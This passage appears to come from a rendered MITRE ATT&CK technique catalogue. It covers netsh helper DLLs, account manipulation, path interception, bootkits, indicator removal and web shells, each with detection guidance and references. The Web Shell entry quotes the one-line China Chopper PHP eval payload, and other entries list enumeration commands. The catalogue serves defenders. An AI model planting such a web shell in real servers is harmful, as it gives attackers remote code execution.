<p>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 853. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1095">https://attack.mitre.org/wiki/Technique/T1095</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://support.microsoft.com/KB/170292">http://support.microsoft.com/KB/170292</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_netsh_helper_dll_t1128"><a class="anchor" href="#_netsh_helper_dll_t1128"></a><a class="link" href="#_netsh_helper_dll_t1128">Netsh Helper DLL - T1128</a></h3>
<div class="paragraph">
<p>Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>Adversaries can use netsh.exe with helper DLLs to proxy execution of arbitrary code in a persistent manner when netsh.exe is executed automatically with another Persistence technique or if other persistent software is present on the system that executes netsh.exe as part of its normal functionality. Examples include some VPN software that invoke netsh.exe. (Citation: Demaske Netsh Persistence)</p>
</div>
<div class="paragraph">
<p>Proof of concept code exists to load Cobalt Strike&#8217;s payload using netsh.exe helper DLLs. (Citation: Github Netsh Helper CS Beacon)</p>
</div>
<div class="paragraph">
<p>Detection: It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt; registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, DLL monitoring, Windows Registry</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>System Requirements: netsh</p>
</div>
<div class="paragraph">
<p>Contributors: Matthew Demaske, Adaptforward</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 854. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1128">https://attack.mitre.org/wiki/Technique/T1128</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/library/bb490939.aspx">https://technet.microsoft.com/library/bb490939.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html">https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/outflankbv/NetshHelperBeacon">https://github.com/outflankbv/NetshHelperBeacon</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_account_manipulation_t1098"><a class="anchor" href="#_account_manipulation_t1098"></a><a class="link" href="#_account_manipulation_t1098">Account Manipulation - T1098</a></h3>
<div class="paragraph">
<p>Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.</p>
</div>
<div class="paragraph">
<p>Detection: Collect events that correlate with changes to account objects on systems and the domain, such as event ID 4738. (Citation: Microsoft User Modified Event) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ (Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password. (Citation: GitHub Mimikatz Issue 92 June 2017)</p>
</div>
<div class="paragraph">
<p>Use of credentials may also occur at unusual times or to unusual systems or services and may correlate with other suspicious activity.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs, API monitoring, Windows event logs, Packet capture</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 855. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1098">https://attack.mitre.org/wiki/Technique/T1098</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://docs.microsoft.com/windows/device-security/auditing/event-4738">https://docs.microsoft.com/windows/device-security/auditing/event-4738</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM">https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/gentilkiwi/mimikatz/issues/92">https://github.com/gentilkiwi/mimikatz/issues/92</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_re_opened_applications_t1164"><a class="anchor" href="#_re_opened_applications_t1164"></a><a class="link" href="#_re_opened_applications_t1164">Re-opened Applications - T1164</a></h3>
<div class="paragraph">
<p>Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at &lt;code&gt;~/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt; and &lt;code&gt;~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).</p>
</div>
<div class="paragraph">
<p>Detection: Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 856. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1164">https://attack.mitre.org/wiki/Technique/T1164</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf">https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_remote_system_discovery_t1018"><a class="anchor" href="#_remote_system_discovery_t1018"></a><a class="link" href="#_remote_system_discovery_t1018">Remote System Discovery - T1018</a></h3>
<div class="paragraph">
<p>Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Examples of tools and commands that acquire this information include "ping" or "net view" using Net.</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>Specific to Mac, the &lt;code&gt;bonjour&lt;/code&gt; protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as "ping" and others can be used to gather information about remote systems.</p>
</div>
<div class="paragraph">
<p>===Linux===</p>
</div>
<div class="paragraph">
<p>Utilities such as "ping" and others can be used to gather information about remote systems.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 857. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1018">https://attack.mitre.org/wiki/Technique/T1018</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_permission_groups_discovery_t1069"><a class="anchor" href="#_permission_groups_discovery_t1069"></a><a class="link" href="#_permission_groups_discovery_t1069">Permission Groups Discovery - T1069</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to find local system or domain-level groups and permissions settings.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Examples of commands that can list groups are &lt;code&gt;net group /domain&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; using the Net utility.</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>On Mac, this same thing can be accomplished with the &lt;code&gt;dscacheutil -q group&lt;/code&gt; for the domain, or &lt;code&gt;dscl . -list /Groups&lt;/code&gt; for local groups.</p>
</div>
<div class="paragraph">
<p>===Linux===</p>
</div>
<div class="paragraph">
<p>On Linux, local groups can be enumerated with the &lt;code&gt;groups&lt;/code&gt; command and domain groups via the &lt;code&gt;ldapsearch&lt;/code&gt; command.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, Windows, macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 858. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1069">https://attack.mitre.org/wiki/Technique/T1069</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_file_deletion_t1107"><a class="anchor" href="#_file_deletion_t1107"></a><a class="link" href="#_file_deletion_t1107">File Deletion - T1107</a></h3>
<div class="paragraph">
<p>Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.</p>
</div>
<div class="paragraph">
<p>There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native cmd functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)</p>
</div>
<div class="paragraph">
<p>Detection: It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, Windows, macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: Binary file metadata, File monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Host forensic analysis</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Contributors: Walker Johnson</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 859. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1107">https://attack.mitre.org/wiki/Technique/T1107</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/">http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_path_interception_t1034"><a class="anchor" href="#_path_interception_t1034"></a><a class="link" href="#_path_interception_t1034">Path Interception - T1034</a></h3>
<div class="paragraph">
<p>Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of cmd in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019)</p>
</div>
<div class="paragraph">
<p>There are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.</p>
</div>
<div class="paragraph">
<p>===Unquoted Paths===
Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., &lt;code&gt;C:\unsafe path with space\program.exe&lt;/code&gt; vs. &lt;code&gt;"C:\safe path with space\program.exe"&lt;/code&gt;). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is &lt;code&gt;C:\program files\myapp.exe&lt;/code&gt;, an adversary may create a program at &lt;code&gt;C:\program.exe&lt;/code&gt; that will be run instead of the intended program.</p>
</div>
<div class="paragraph">
<p>===PATH Environment Variable Misconfiguration===
The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, &lt;code&gt;%SystemRoot%\system32&lt;/code&gt; (e.g., &lt;code&gt;C:\Windows\system32&lt;/code&gt;), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.</p>
</div>
<div class="paragraph">
<p>For example, if &lt;code&gt;C:\example path&lt;/code&gt; precedes &lt;code&gt;C:\Windows\system32&lt;/code&gt; is in the PATH environment variable, a program that is named net.exe and placed in &lt;code&gt;C:\example path&lt;/code&gt; will be called instead of the Windows system "net" when "net" is executed from the command-line.</p>
</div>
<div class="paragraph">
<p>===Search Order Hijacking===
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program&#8217;s directory.</p>
</div>
<div class="paragraph">
<p>For example, "example.exe" runs "cmd.exe" with the command-line argument &lt;code&gt;net user&lt;/code&gt;. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then &lt;code&gt;cmd.exe /C net user&lt;/code&gt; will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property)</p>
</div>
<div class="paragraph">
<p>Search order hijacking is also a common practice for hijacking DLL loads and is covered in DLL Search Order Hijacking.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.</p>
</div>
<div class="paragraph">
<p>Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: User, Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Contributors: Stefan Kanthak</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 860. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1034">https://attack.mitre.org/wiki/Technique/T1034</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/">https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://support.microsoft.com/KB/103000">http://support.microsoft.com/KB/103000</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464">https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-us/library/ms682425">http://msdn.microsoft.com/en-us/library/ms682425</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120">http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-us/library/ms687393">http://msdn.microsoft.com/en-us/library/ms687393</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx">https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bootkit_t1067"><a class="anchor" href="#_bootkit_t1067"></a><a class="link" href="#_bootkit_t1067">Bootkit - T1067</a></h3>
<div class="paragraph">
<p>A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016)</p>
</div>
<div class="paragraph">
<p>Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.</p>
</div>
<div class="paragraph">
<p>===Master Boot Record===
The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)</p>
</div>
<div class="paragraph">
<p>===Volume Boot Record===
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.</p>
</div>
<div class="paragraph">
<p>Detection: Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, MBR, VBR</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 861. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1067">https://attack.mitre.org/wiki/Technique/T1067</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion">http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/regional/fr%20FR/offers/pdfs/ig-mtrends-2016.pdf">https://www.fireeye.com/content/dam/fireeye-www/regional/fr%20FR/offers/pdfs/ig-mtrends-2016.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_indicator_removal_on_host_t1070"><a class="anchor" href="#_indicator_removal_on_host_t1070"></a><a class="link" href="#_indicator_removal_on_host_t1070">Indicator Removal on Host - T1070</a></h3>
<div class="paragraph">
<p>Adversaries may delete or alter generated event files on a host system, including potentially captured files such as quarantined malware. This may compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred.</p>
</div>
<div class="paragraph">
<p>Detection: File system monitoring may be used to detect improper deletion or modification of indicator files. Events not stored on the file system will require different detection mechanisms.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Anti-virus, Log analysis, Host intrusion prevention systems</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 862. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1070">https://attack.mitre.org/wiki/Technique/T1070</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_exfiltration_over_other_network_medium_t1011"><a class="anchor" href="#_exfiltration_over_other_network_medium_t1011"></a><a class="link" href="#_exfiltration_over_other_network_medium_t1011">Exfiltration Over Other Network Medium - T1011</a></h3>
<div class="paragraph">
<p>Exfiltration could occur over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel. Adversaries could choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.</p>
</div>
<div class="paragraph">
<p>Detection: Processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a mouse click or key press) but access the network without such may be malicious.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: User interface, Process monitoring</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<div class="paragraph">
<p>Contributors: Itzik Kotler, SafeBreach</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 863. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1011">https://attack.mitre.org/wiki/Technique/T1011</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_data_from_local_system_t1005"><a class="anchor" href="#_data_from_local_system_t1005"></a><a class="link" href="#_data_from_local_system_t1005">Data from Local System - T1005</a></h3>
<div class="paragraph">
<p>Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.</p>
</div>
<div class="paragraph">
<p>Adversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a Command-Line Interface, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>System Requirements: Privileges to access certain files and directories</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 864. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1005">https://attack.mitre.org/wiki/Technique/T1005</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_web_shell_t1100"><a class="anchor" href="#_web_shell_t1100"></a><a class="link" href="#_web_shell_t1100">Web Shell - T1100</a></h3>
<div class="paragraph">
<p>A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)</p>
</div>
<div class="paragraph">
<p>Web shells may serve as Redundant Access or as a persistence mechanism in case an adversary&#8217;s primary access methods are detected and removed.</p>
</div>
<div class="paragraph">
<p>Detection: Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013)</p>
</div>
<div class="paragraph">
<p>&lt;code&gt;&lt;?php @eval($_POST['password']);&gt;&lt;/code&gt;</p>
</div>
<div class="paragraph">
<p>Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server&#8217;s content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Anti-virus, File monitoring, Process monitoring, Authentication logs, Netflow/Enclave netflow</p>
</div>
<div class="paragraph">
<p>Effective Permissions: User, SYSTEM</p>
</div>
<div class="paragraph">
<p>System Requirements: Adversary access to Web server with vulnerability or account to upload and serve the Web shell file.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 865. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1100">https://attack.mitre.org/wiki/Technique/T1100</a></p></td>
</tr>
<tr>
